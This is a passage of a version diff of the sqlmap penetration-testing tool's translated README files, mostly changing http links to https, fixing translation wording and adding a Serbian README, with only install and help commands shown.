https://sqlmap.org * Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom * Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues * Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki * Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Demostraciones: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-fa-IR.md sqlmap-1.5.11.5/doc/translations/README-fa-IR.md --- sqlmap-1.4.4/doc/translations/README-fa-IR.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-fa-IR.md 2021-11-12 18:30:56.000000000 +0000 @@ -73,12 +73,12 @@ ---- -* خانه: http://sqlmap.org +* خانه: https://sqlmap.org * دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * کایمت و نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom * پیگری مشکلات: https://github.com/sqlmapproject/sqlmap/issues * راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki * سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ * تویتر: [@sqlmap](https://twitter.com/sqlmap) -* رسانه: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * عکس‌ها: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-fr-FR.md sqlmap-1.5.11.5/doc/translations/README-fr-FR.md --- sqlmap-1.4.4/doc/translations/README-fr-FR.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-fr-FR.md 2021-11-12 18:30:56.000000000 +0000 @@ -19,7 +19,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6**, **2.7** et **3.x** de [Python](http://www.python.org/download/) +sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6**, **2.7** et **3.x** de [Python](https://www.python.org/download/) Utilisation ---- @@ -32,18 +32,18 @@ python sqlmap.py -hh -Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples. +Vous pouvez regarder une vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples. Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Liens ---- -* Page d'acceuil: http://sqlmap.org +* Page d'acceuil: https://sqlmap.org * Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues * Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki * Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Démonstrations: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-gr-GR.md sqlmap-1.5.11.5/doc/translations/README-gr-GR.md --- sqlmap-1.4.4/doc/translations/README-gr-GR.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-gr-GR.md 2021-11-12 18:30:56.000000000 +0000 @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6**, **2.7** και **3.x** σε όποια πλατφόρμα. +Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](https://www.python.org/download/) έκδοσης **2.6**, **2.7** και **3.x** σε όποια πλατφόρμα. Χρήση ---- @@ -39,12 +39,12 @@ Σύνδεσμοι ---- -* Αρχική σελίδα: http://sqlmap.org +* Αρχική σελίδα: https://sqlmap.org * Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues * Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki * Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-hr-HR.md sqlmap-1.5.11.5/doc/translations/README-hr-HR.md --- sqlmap-1.4.4/doc/translations/README-hr-HR.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-hr-HR.md 2021-11-12 18:30:56.000000000 +0000 @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. +sqlmap radi bez posebnih zahtjeva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. Korištenje ---- @@ -39,12 +39,12 @@ Poveznice ---- -* Početna stranica: http://sqlmap.org +* Početna stranica: https://sqlmap.org * Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Prijava problema: https://github.com/sqlmapproject/sqlmap/issues * Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki * Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-id-ID.md sqlmap-1.5.11.5/doc/translations/README-id-ID.md --- sqlmap-1.4.4/doc/translations/README-id-ID.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-id-ID.md 2021-11-12 18:30:56.000000000 +0000 @@ -2,7 +2,7 @@ [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) -sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. +sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basis data. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur handal bagi _penetration tester_, beragam cara untuk mendeteksi basis data, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. Tangkapan Layar ---- @@ -14,14 +14,13 @@ Instalasi ---- -Anda dapat mengunduh tarball versi terbaru [di sini] -(https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master). +Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master). Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap): git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6**, **2.7** dan **3.x** pada platform apapun. +sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi **2.6**, **2.7** dan **3.x** pada platform apapun. Penggunaan ---- @@ -40,12 +39,12 @@ Tautan ---- -* Situs: http://sqlmap.org +* Situs: https://sqlmap.org * Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues * Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki * Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos) +* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos) * Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-it-IT.md sqlmap-1.5.11.5/doc/translations/README-it-IT.md --- sqlmap-1.4.4/doc/translations/README-it-IT.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-it-IT.md 2021-11-12 18:30:56.000000000 +0000 @@ -1,4 +1,4 @@ -# sqlmap +r# sqlmap [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap è in grado di funzionare con le versioni **2.6**, **2.7** e **3.x** di [Python](http://www.python.org/download/) su ogni piattaforma. +sqlmap è in grado di funzionare con le versioni **2.6**, **2.7** e **3.x** di [Python](https://www.python.org/download/) su ogni piattaforma. Utilizzo ---- @@ -39,12 +39,12 @@ Link ---- -* Sito: http://sqlmap.org +* Sito: https://sqlmap.org * Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki * Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Dimostrazioni: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-ja-JP.md sqlmap-1.5.11.5/doc/translations/README-ja-JP.md --- sqlmap-1.4.4/doc/translations/README-ja-JP.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-ja-JP.md 2021-11-12 18:30:56.000000000 +0000 @@ -21,7 +21,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。 +sqlmapは、 [Python](https://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。 使用法 ---- @@ -40,12 +40,12 @@ リンク ---- -* ホームページ: http://sqlmap.org +* ホームページ: https://sqlmap.org * ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom * 課題管理: https://github.com/sqlmapproject/sqlmap/issues * ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki * よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* デモ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-ko-KR.md sqlmap-1.5.11.5/doc/translations/README-ko-KR.md --- sqlmap-1.4.4/doc/translations/README-ko-KR.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-ko-KR.md 2021-11-12 18:30:56.000000000 +0000 @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap은 [Python](http://www.python.org/download/) 버전 **2.6**, **2.7** 그리고 **3.x** 을 통해 모든 플랫폼 위에서 사용 가능합니다. +sqlmap은 [Python](https://www.python.org/download/) 버전 **2.6**, **2.7** 그리고 **3.x** 을 통해 모든 플랫폼 위에서 사용 가능합니다. 사용법 ---- @@ -39,12 +39,12 @@ 링크 ---- -* 홈페이지: http://sqlmap.org +* 홈페이지: https://sqlmap.org * 다운로드: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * RSS 피드 커밋: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * 사용자 매뉴얼: https://github.com/sqlmapproject/sqlmap/wiki * 자주 묻는 질문 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * 트위터: [@sqlmap](https://twitter.com/sqlmap) -* 시연 영상: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* 시연 영상: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * 스크린샷: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-pl-PL.md sqlmap-1.5.11.5/doc/translations/README-pl-PL.md --- sqlmap-1.4.4/doc/translations/README-pl-PL.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-pl-PL.md 2021-11-12 18:30:56.000000000 +0000 @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -do użycia sqlmap potrzebny jest [Python](http://www.python.org/download/) w wersji **2.6**, **2.7** lub **3.x** na dowolnej platformie systemowej. +do użycia sqlmap potrzebny jest [Python](https://www.python.org/download/) w wersji **2.6**, **2.7** lub **3.x** na dowolnej platformie systemowej. Sposób użycia ---- @@ -39,12 +39,12 @@ Odnośniki ---- -* Strona projektu: http://sqlmap.org +* Strona projektu: https://sqlmap.org * Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues * Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki * Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Dema: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Dema: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-pt-BR.md sqlmap-1.5.11.5/doc/translations/README-pt-BR.md --- sqlmap-1.4.4/doc/translations/README-pt-BR.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-pt-BR.md 2021-11-12 18:30:56.000000000 +0000 @@ -14,14 +14,13 @@ Instalação ---- -Você pode baixar o arquivo tar mais recente clicando [aqui] -(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master). +Você pode baixar o arquivo tar mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master). De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap): git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6**, **2.7** e **3.x** em todas as plataformas. +sqlmap funciona em [Python](https://www.python.org/download/) nas versões **2.6**, **2.7** e **3.x** em todas as plataformas. Como usar ---- @@ -40,12 +39,12 @@ Links ---- -* Homepage: http://sqlmap.org +* Homepage: https://sqlmap.org * Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki * Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos) +* Demonstrações: [#1](https://www.youtube.com/user/inquisb/videos) e [#2](https://www.youtube.com/user/stamparm/videos) * Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-rs-RS.md sqlmap-1.5.11.5/doc/translations/README-rs-RS.md --- sqlmap-1.4.4/doc/translations/README-rs-RS.md 1970-01-01 00:00:00.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-rs-RS.md 2021-11-12 18:30:56.000000000 +0000 @@ -0,0 +1,50 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap je alat otvorenog koda namenjen za penetraciono testiranje koji automatizuje proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije i preuzimanje baza podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko uzimanja podataka iz baze, do pristupa zahvaćenom fajl sistemu i izvršavanja komandi na operativnom sistemu korištenjem tzv. "out-of-band" veza. + +Slike +---- + +![Slika](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Možete posetiti [kolekciju slika](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gde su demonstrirane neke od e se demonstriraju neke od funkcija na wiki stranicama. + +Instalacija +---- + +Možete preuzeti najnoviji tarball klikom [ovde](https://github.com/sqlmapproject/sqlmap/tarball/master) ili najnoviji zipball klikom [ovde](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Opciono, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap radi bez posebnih zahteva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. + +Korišćenje +---- + +Kako biste dobili listu osnovnih opcija i prekidača koristite: + + python sqlmap.py -h + +Kako biste dobili listu svih opcija i prekidača koristite: + + python sqlmap.py -hh + +Možete pronaći primer izvršavanja [ovde](https://asciinema.org/a/46601). +Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih funkcija, te opis svih opcija i prekidača, zajedno s primerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Linkovi +---- + +* Početna stranica: https://sqlmap.org +* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed promena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues +* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki +* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Slike: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-ru-RUS.md sqlmap-1.5.11.5/doc/translations/README-ru-RUS.md --- sqlmap-1.4.4/doc/translations/README-ru-RUS.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-ru-RUS.md 2021-11-12 18:30:56.000000000 +0000 @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap работает из коробки с [Python](http://www.python.org/download/) версии **2.6**, **2.7** и **3.x** на любой платформе. +sqlmap работает из коробки с [Python](https://www.python.org/download/) версии **2.6**, **2.7** и **3.x** на любой платформе. Использование ---- @@ -39,12 +39,12 @@ Ссылки ---- -* Основной сайт: http://sqlmap.org +* Основной сайт: https://sqlmap.org * Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues * Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki * Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Демки: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-tr-TR.md sqlmap-1.5.11.5/doc/translations/README-tr-TR.md --- sqlmap-1.4.4/doc/translations/README-tr-TR.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-tr-TR.md 2021-11-12 18:30:56.000000000 +0000 @@ -23,7 +23,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir. +sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir. Kullanım ---- @@ -37,17 +37,17 @@ python sqlmap.py -hh -Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz +Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası için sqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz -Links +Bağlantılar ---- -* Anasayfa: http://sqlmap.org +* Anasayfa: https://sqlmap.org * İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues * Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki * Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Demolar: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-uk-UA.md sqlmap-1.5.11.5/doc/translations/README-uk-UA.md --- sqlmap-1.4.4/doc/translations/README-uk-UA.md 2020-04-02 22:16:38.000000000 +0000 +++ sqlmap-1.5.11.5/doc/translations/README-uk-UA.md 2021-11-12 18:30:56.000000000 +0000 @@ -20,7 +20,7 @@ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap «працює з коробки» з [Python](http://www.python.org/download/) версії **2.6**, **2.7** та **3.x** на будь-якій платформі. +sqlmap «працює з коробки» з [Python](https://www.python.org/download/) версії **2.6**, **2.7** та **3.x** на будь-якій платформі. Використання ---- @@ -39,12 +39,12 @@ Посилання ---- -* Основний сайт: http://sqlmap.org +* Основний сайт: https://sqlmap.org * Завантаження: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) або [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * Канал новин RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom * Відстеження проблем: https://github.com/sqlmapproject/sqlmap/issues * Інструкція користувача: https://github.com/sqlmapproject/sqlmap/wiki * Поширенні питання (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ * Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff -Nru sqlmap-1.4.4/doc/translations/README-vi-VN.md sqlmap-1.5.11.5/doc/translations/README-vi-VN.md --- sqlmap-1.4.4/doc/translations/README-vi-VN.md 1970-01-01 00:00:00.000000000 +0000 